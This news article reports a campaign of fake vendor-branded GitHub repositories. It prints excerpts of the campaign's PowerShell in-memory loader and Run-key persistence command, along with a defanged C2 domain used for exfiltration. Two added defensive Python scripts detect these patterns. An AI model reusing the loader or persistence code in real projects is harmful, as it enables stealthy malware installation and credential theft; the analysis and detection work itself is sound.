Weaponized Malwarebytes, LastPass, Citibank, SentinelOne, and Others on GitHub Deliver Malware

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

In recent weeks, cybersecurity teams have observed a surge in malicious GitHub repositories masquerading as legitimate security and financial software.

Threat actors have crafted convincing forks of projects bearing names like Malwarebytes, LastPass, Citibank, and SentinelOne, populated with trojanized installers and scripts that deliver stealthy malware payloads.

These repositories exploit the trust developers place in open source platforms, luring users into executing seemingly benign code. Early indicators suggest the campaign began in late August 2025, rapidly proliferating through GitHub’s trending and search features.

Malicious search results (Source – Malwarebytes)

The attackers register accounts mimicking official vendor identities, complete with cloned logos, README files, and release notes.

When unsuspecting users clone or download these repositories, the build scripts invoke a hidden PowerShell downloader that retrieves payloads from remote command-and-control (C2) servers.

Malwarebytes researchers identified the malware after noticing anomalous network connections emerging from sandboxed build environments, triggering an investigation that unmasked the underlying attack chain.

Initial analysis reveals that once executed, the dropper goes to work: it decrypts embedded shellcode, injects it into a suspended process, and establishes persistence via registry run keys.

Victims experience no visible alerts or installation failures, while the malware stealthily harvests system information and credentials before deploying secondary modules.

The impact is twofold: organizations suffer data exfiltration risks, while individual users face credential theft and potential account takeover.

Beyond the direct financial and reputational damage, this campaign underscores a new attack vector: weaponizing open source collaboration platforms.

Security teams must elevate scrutiny of code origin and integrity, incorporating automated scanning tools into CI/CD pipelines to flag suspicious scripts and remote downloads.

Fake ‘GET MALWAREBYTES’ button on the dedicated GitHub page (Source – Malwarebytes)

The ease with which attackers replicated vendor identities on GitHub highlights the need for stronger verification measures across developer communities.

Infection Mechanism

At the heart of this campaign lies a sophisticated PowerShell-based infection mechanism.

Upon cloning the malicious repository, users are instructed to execute a build script named install.ps1, which appears to perform routine setup tasks.

In reality, the script contains an obfuscated block that decodes a Base64 payload before executing it in memory:

$enc = 'JABXAG8AbgBlAAD...'                              # embedded Base64 blob (truncated in the report)
$bytes = [Convert]::FromBase64String($enc)                # decode it to raw bytes
$asm = [System.Reflection.Assembly]::Load($bytes)         # load the bytes as a .NET assembly without writing to disk
$entry = $asm.EntryPoint                                  # locate the assembly's Main method
$entry.Invoke($null, (,@()))                              # run it with an empty argument array
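The automated scanning the article recommends for CI/CD pipelines, applied to the install.ps1 pattern just shown: an added Python example, not code from the original report or from Malwarebytes, that statically triages PowerShell scripts for the Base64-decode / Assembly.Load / EntryPoint chain, remote-download cmdlets and Run-key persistence. The rule ids, weights, thresholds and the two sample scripts embedded at the bottom are constructed for this example; the malicious sample mirrors the article's excerpt with dummy payload data.

```python
"""Static triage of PowerShell build scripts for in-memory loader patterns.

Added example: rule ids, weights, thresholds and the two sample scripts are
constructed for this demonstration, not taken from the campaign's own files.
"""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass
from pathlib import Path

# (rule id, pattern, weight). Weights are assumptions chosen so that the
# decode-and-reflectively-load pair alone crosses the blocking threshold.
RULES = [
    ("b64_decode",        re.compile(r"\[Convert\]::FromBase64String", re.I), 2),
    ("reflective_load",   re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\b", re.I), 4),
    ("entrypoint_invoke", re.compile(r"\.EntryPoint\b", re.I), 2),
    ("remote_download",   re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer", re.I), 2),
    ("run_key_persist",   re.compile(r"CurrentVersion\\Run(Once)?\b", re.I), 3),
    ("appdata_exe",       re.compile(r"\$env:APPDATA\\[^\s'\"]+\.exe", re.I), 1),
    ("long_b64_literal",  re.compile(r"['\"][A-Za-z0-9+/]{40,}={0,2}['\"]"), 1),
]
BLOCK_AT, REVIEW_AT = 6, 2


@dataclass
class Finding:
    path: str
    hits: list[str]
    score: int
    verdict: str  # "allow" | "review" | "block"


def scan_text(text: str, path: str = "<inline>") -> Finding:
    """Score one script; the b64_decode + reflective_load pair blocks on its own."""
    hits = [rid for rid, rx, _ in RULES if rx.search(text)]
    score = sum(w for rid, _, w in RULES if rid in hits)
    chain = {"b64_decode", "reflective_load"} <= set(hits)
    if chain or score >= BLOCK_AT:
        verdict = "block"
    elif score >= REVIEW_AT:
        verdict = "review"
    else:
        verdict = "allow"
    return Finding(path, hits, score, verdict)


def scan_tree(root: Path) -> list[Finding]:
    """Scan every *.ps1 under root, e.g. a freshly cloned repository in a CI job."""
    return [scan_text(p.read_text(errors="replace"), str(p)) for p in sorted(root.rglob("*.ps1"))]


# Constructed sample mirroring the install.ps1 excerpt in the article (payload is dummy data).
SAMPLE_INSTALL_PS1 = r"""
Write-Host "Preparing build environment..."
$enc = 'JABXAG8AbgBlAAD' + 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
$bytes = [Convert]::FromBase64String($enc)
$asm = [System.Reflection.Assembly]::Load($bytes)
$entry = $asm.EntryPoint
$entry.Invoke($null, (,@()))
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Windows Defender Update" -Value "$env:APPDATA\msupd.exe"
"""

# Constructed benign build script for comparison.
SAMPLE_BENIGN_PS1 = r"""
param([string]$Configuration = "Release")
dotnet restore
dotnet build --configuration $Configuration
Copy-Item -Path .\bin\$Configuration\* -Destination .\dist -Recurse
"""

if __name__ == "__main__":
    findings = scan_tree(Path(sys.argv[1])) if len(sys.argv) > 1 else [
        scan_text(SAMPLE_INSTALL_PS1, "sample/install.ps1"),
        scan_text(SAMPLE_BENIGN_PS1, "sample/build.ps1"),
    ]
    for f in findings:
        print(f"{f.verdict:6} score={f.score:2} {f.path} hits={','.join(f.hits) or '-'}")
    # Non-zero exit so a pipeline step fails the build when a script is blocked.
    sys.exit(1 if any(f.verdict == "block" for f in findings) else 0)
```

Run it with a repository path (`python scan_ps1.py ./cloned-repo`) as a pre-build step; without arguments it scores the two embedded samples. The decode-then-load pair is treated as blocking regardless of the total because that combination has almost no legitimate use in a build script, whereas a lone `Invoke-WebRequest` only warrants review.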

Once loaded, this in-memory assembly (a variant of the SilentRunner loader) seeks out legitimate Windows processes—commonly svchost.exe—and performs process hollowing to evade detection.

The hollowed process then initializes the main payload, which registers persistence through a registry key:

New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Windows Defender Update" -Value "$env:APPDATA\msupd.exe"

Throughout this sequence, network indicators include HTTPS requests to hxxps://secure-update-server[.]com/manifest.json and subsequent POSTs exfiltrating environment variables.
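The persistence and network indicators above, turned into defender-side detection logic: an added Python example (not from the original article or from Malwarebytes) that checks registry Run-key write events and proxy log lines. The event shape, the sample records, the svchost allowlist suffixes and the heuristics are assumptions made for this example; the only value taken from the article is the defanged C2 domain, which is refanged only at match time.

```python
"""Detection checks for the Run-key persistence and C2 traffic indicators above.

Added example: the event shapes, sample records, allowlist suffixes and
heuristics are assumptions for this demonstration; only the defanged C2
domain comes from the article.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

IOC_DOMAINS_DEFANGED = {"secure-update-server[.]com"}  # from the report, kept defanged at rest


def refang(value: str) -> str:
    """Turn a defanged indicator back into a matchable string."""
    return value.replace("[.]", ".").replace("hxxp", "http")


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
USER_WRITABLE = re.compile(r"\\(AppData\\(Roaming|Local)|Temp|Downloads|Public)\\", re.I)
TRUSTED_DIRS = re.compile(r"^[A-Z]:\\(Program Files( \(x86\))?|Windows)\\", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
VENDOR_WORDS = ("defender", "malwarebytes", "sentinelone", "lastpass", "citibank")  # names abused in the campaign
# Assumed allowlist: hosts svchost.exe is expected to contact on a typical workstation.
ALLOWED_SVCHOST_SUFFIXES = (".microsoft.com", ".windowsupdate.com", ".msftconnecttest.com")

# Constructed proxy log format: "<ts> <src_ip> <process> <method> <host> <path> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<proc>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) (?P<status>\d{3})$"
)


@dataclass
class Alert:
    source: str
    reasons: list[str]


def check_registry_event(ev: dict) -> Optional[Alert]:
    """ev: registry value-set event with 'target' (full value path), 'details' (data), 'image' (writer)."""
    if not RUN_KEY.search(ev["target"]):
        return None
    value_name = ev["target"].rsplit("\\", 1)[-1].lower()
    data = ev["details"].strip('"')
    writer = ev["image"].lower().rsplit("\\", 1)[-1]
    reasons = []
    if USER_WRITABLE.search(data):
        reasons.append("autorun target lives in a user-writable directory")
    if writer in SCRIPT_HOSTS:
        reasons.append(f"autorun written by scripting host {writer}")
    if any(w in value_name for w in VENDOR_WORDS) and not TRUSTED_DIRS.match(data):
        reasons.append("vendor-like value name outside a trusted install directory")
    return Alert(ev["target"], reasons) if reasons else None


def check_network_line(line: str) -> Optional[Alert]:
    m = LOG_RE.match(line)
    if not m:
        return None
    host, proc, method = m["host"].lower(), m["proc"].lower(), m["method"]
    reasons = []
    if host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS):
        reasons.append(f"contact with known C2 domain {host}")
    # The hollowed svchost.exe is what POSTs the harvested data; a genuine
    # svchost has no reason to POST to hosts outside the allowlist.
    if proc == "svchost.exe" and method == "POST" and not host.endswith(ALLOWED_SVCHOST_SUFFIXES):
        reasons.append("POST from svchost.exe to a non-allowlisted host")
    return Alert(line, reasons) if reasons else None


# Constructed sample telemetry: one event per category of outcome.
SAMPLE_REGISTRY_EVENTS = [
    {"target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Defender Update",
     "details": r"C:\Users\alice\AppData\Roaming\msupd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "details": r"C:\Windows\System32\SecurityHealthSystray.exe",
     "image": r"C:\Windows\System32\msiexec.exe"},
    {"target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "details": "1", "image": r"C:\Windows\explorer.exe"},
]
SAMPLE_PROXY_LOG = """\
2025-09-02T10:14:03Z 10.0.0.5 powershell.exe GET secure-update-server.com /manifest.json 200
2025-09-02T10:14:09Z 10.0.0.5 svchost.exe POST secure-update-server.com /collect 200
2025-09-02T10:15:00Z 10.0.0.5 svchost.exe GET download.windowsupdate.com /v11/3/windowsupdate/redir/wuredir.cab 200
2025-09-02T10:16:12Z 10.0.0.7 chrome.exe GET github.com /example-org/example-repo 200
"""


def run_all() -> list[Alert]:
    alerts = [a for a in map(check_registry_event, SAMPLE_REGISTRY_EVENTS) if a]
    alerts += [a for a in map(check_network_line, SAMPLE_PROXY_LOG.splitlines()) if a]
    return alerts


if __name__ == "__main__":
    for alert in run_all():
        print(alert.source)
        for reason in alert.reasons:
            print("   -", reason)
```

The registry check fires on three independent signals so it still alerts if the attackers rename the value or move the binary, and the network check pairs the static IoC with a behavioural rule (svchost.exe POSTing outside its allowlist) that survives a C2 domain change.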

The brevity and stealth of the loader’s operations allow the campaign to infect systems with minimal forensic artifacts, illustrating the evolving sophistication of code-execution exploits on open source platforms.
